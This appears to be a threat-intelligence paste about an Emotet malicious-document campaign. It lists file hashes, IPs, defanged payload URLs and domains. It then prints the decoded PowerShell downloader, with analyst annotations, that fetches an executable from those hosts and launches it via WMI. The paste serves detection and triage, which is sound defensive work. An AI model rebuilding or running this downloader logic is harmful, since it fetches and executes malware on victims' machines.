paladin316

Emotet_Doc_out_2020-10-29_23_40.txt

Oct 29th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (presumably of the malicious documents, per the paste title; hashes of the dropped .exe payload are not included):
  4. 092fb8ce8a290c30630339fea8ac407a76fcd39e31a62aef7b4d0c917b31da5e
  5. 220c19f5b011876c257bc3e3e48c3b032be339e535a8e93b564bfbe65ea86610
  6. (the hash above appeared twice in the original paste; the duplicate is dropped, leaving three unique hashes)
  7. 93edcc5c13cef6e563c7c530cf9462e92dd1c80495800814540c045a9fc2cabf
  8.  
  9.  
  10. IPs (eleven addresses for seven hosts, so likely resolved hosting addresses at collection time; some may be shared hosting or CDN/reverse-proxy front ends — confirm ownership before blocking by IP, since the domains and URL paths below are the more precise indicators):
  11. 104.18.63.171
  12. 104.28.18.90
  13. 104.28.22.149
  14. 104.28.23.149
  15. 104.28.6.70
  16. 104.28.7.70
  17. 141.98.10.47
  18. 172.67.132.92
  19. 172.67.133.164
  20. 172.67.180.161
  21. 35.213.176.43
  22.  
  23.  
  24.  
  25. URLs (defanged, hxxps; these are the payload download locations iterated in order by the decoded PowerShell below — the first one that serves a file of at least 44263 bytes is executed):
  26. hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
  27. hxxps://homewatchamelia.com/wp-admin/qmK/
  28. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
  29. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
  30. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
  31. hxxps://420extracts.ca/cgi-bin/Ecv/
  32. hxxps://casinopalacett.com/wp-admin/voZDArg/
  33.  
  34.  
  35. Domains:
  36. enjoymylifecheryl.com
  37. homewatchamelia.com
  38. seramporemunicipality.org
  39. imperfectdream.com
  40. mayxaycafe.net
  41. 420extracts.ca
  42. casinopalacett.com
  43.  
  44.  
  45. Decoded Base64 PowerShell (the downloader stage, presumably launched by the document macro; quotes, '+' and parentheses appear to have been lost in decoding, so it is not runnable as pasted — do not execute, use for detection and triage only):
  # Analyst annotation (review): Emotet maldoc PowerShell downloader stage, as decoded from the
  # embedded Base64. Quotes, '+' and parentheses appear to have been stripped by the decode/paste
  # and the first line carries non-text residue, so this text does not run as-is. Do NOT execute;
  # it is kept for detection and triage only. Variable names are randomized per sample; the
  # one-liners of the form `$X=Y;` between the real statements are filler and never read again.
  46. <���^, $8P4vcu = [tyPe]"{5}{2}{0}{3}{1}{4}" -f M.i,O,yste,O.dIrect,Ry,S ;
  # ^ string-reorder obfuscation: {5}{2}{0}{3}{1}{4} over (M.i, O, yste, O.dIrect, Ry, S)
  #   assembles "System.IO.Directory", stored as a [type] in $8P4vcu.
  47. SeT LsV0 [tYpe]"{5}{0}{3}{1}{2}{4}{6}" -F.NE,V,IcEp,T.SeR,oInTmAnAG,sYSTeM,er ;
  # ^ same trick via Set-Variable: assembles "System.Net.ServicePointManager" into $LsV0.
  48. $Rlrkjnw=Qr1ru9y;
  49. $D7qz32b=$Wa6rea4 [char]64 $Dehv673;
  # ^ builds the URL-list delimiter: [char]64 is '@'. $Wa6rea4 and $Dehv673 are not defined
  #   anywhere in the visible text, so presumably empty and $D7qz32b is just "@" (consumed by
  #   the .Split further down).
  50. $O5aqk3g=Xa7q3h0;
  51. dIr VARiAble:8P4Vcu.valuE::"cre`ATeD`IReCT`oRY"$HOME {0}Nscs8ry{0}S9t4g_l{0} -F [CHAr]92;
  # ^ (dir Variable:8P4Vcu).Value is the System.IO.Directory type; the backtick-split method
  #   name is CreateDirectory. [char]92 is '\', so this creates $HOME\Nscs8ry\S9t4g_l\ .
  #   Directory names are sample-specific; the "two random folders under the user profile"
  #   shape is the hunting artefact.
  52. $Ga8ff5s=Nffefbg;
  53. $lSv0::"sE`cU`Rit`yProToCOl" = Tls12;
  # ^ [System.Net.ServicePointManager]::SecurityProtocol = Tls12, so the hxxps downloads
  #   below work on hosts whose default protocol set does not include TLS 1.2.
  54. $Ru818ii=Vzvdenv;
  55. $G9po_gt = Epl6_wa2m;
  # ^ base name of the dropped payload; reused in the drop path below.
  56. $Yfwba66=Thli7b3;
  57. $Irioufu=Y22l3ct;
  58. $Llo6n_w=$HOME{0}Nscs8ry{0}S9t4g_l{0} -F [ChAR]92$G9po_gt.exe;
  # ^ full drop path: $HOME\Nscs8ry\S9t4g_l\Epl6_wa2m.exe.
  59. $Jvjds4y=G_wnx9u;
  60. $H5xr5lm=.new-object nEt.webcLIENt;
  # ^ New-Object Net.WebClient — the downloader. No headers or proxy settings are configured
  #   in the visible text.
  61. $Mmo41vn=hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
  62. hxxps://homewatchamelia.com/wp-admin/qmK/
  63. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
  64. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
  65. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
  66. hxxps://420extracts.ca/cgi-bin/Ecv/
  67. hxxps://casinopalacett.com/wp-admin/voZDArg/."r`EP`Lace"/,[array]/,xwe[0]."sPl`It"$Chkut94 $D7qz32b $Opdketn;
  # ^ the seven payload URLs (same set as the URLs section of this paste). In the sample they
  #   form one string; the paste shows them on separate lines. .Replace(...) strips a marker
  #   (its argument is garbled here) and .Split on the '@' delimiter — again wrapped in two
  #   undefined variables ($Chkut94, $Opdketn) — yields the array the loop below walks.
  #   List order is the retry order.
  68. $Rf7k3zk=Usfuthv;
  69. foreach $Uhbkd7k in $Mmo41vn{try{$H5xr5lm."dO`wnl`Oa`DfIlE"$Uhbkd7k, $Llo6n_w;
  # ^ WebClient.DownloadFile(url, dropPath) for each URL in turn.
  70. $Fsiu4_x=Urtdzox;
  71. If .Get-Item $Llo6n_w."Len`GTh" -ge 44263 {[wmiclass]win32_Process."Cre`A`Te"$Llo6n_w;
  # ^ size gate: the payload is launched only if the downloaded file is at least 44263 bytes
  #   (rejects empty responses / error pages). Launch is via WMI Win32_Process.Create rather
  #   than Start-Process or '&' — worth hunting for: powershell.exe issuing a
  #   Win32_Process.Create whose command line is an .exe under the user profile.
  72. $Yzrcjro=T2a4ijn;
  73. break;
  # ^ the first successful download-and-launch ends the loop; the remaining URLs are fallbacks.
  74. $Ccwk57z=Lslfh6p}}catch{}}$L9wtd00=Vxbiwxu
  # ^ empty catch: any download or launch failure is silently swallowed and the next URL is
  #   tried, so a single dead host does not stop the infection chain.
  75.  